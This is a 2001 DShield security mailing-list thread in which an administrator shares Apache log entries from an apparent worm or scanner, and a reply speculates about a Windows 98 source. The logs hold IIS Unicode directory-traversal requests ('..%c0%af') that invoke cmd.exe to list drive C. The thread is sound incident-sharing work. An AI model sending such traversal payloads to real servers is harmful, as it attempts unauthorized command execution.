[Dshield] New one?

Tony Maro tonym at nlisc.com
Wed Oct 17 14:36:58 GMT 2001


Oh crap - looks like it's trying the standard directory traversal with a
twist, BUT... what's significant is that it looks like it's coming from a
Winblows 98 box!

If there's a new bug infecting 98 that does this that's gonna be one massive
DOS attack.

-----Original Message-----
From: Martin Mueller [mailto:mueller at webpartner.de] 
Sent: Wednesday, October 17, 2001 8:05 AM
To: dshield at dshield.org
Subject: [Dshield] New one?

Hi all,

this log-entrys i found today on a Apache virtual-Webserver of my company.
Sorry, the lines are very long, but all different...

Is this a new "Code Red" or something?
It looks not like the "normal" CR or Nimda to me.

The "Attacking-IP" is located in Brasil(if it is the real :-) ), we are in
Germany.

Best regards,

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Schon geklickt? http://www.urlpartner.de
Favoriten online verwalten
Ein Projekt der Webpartner GmbH




200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winn
t/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir%20c:\




More information about the list mailing list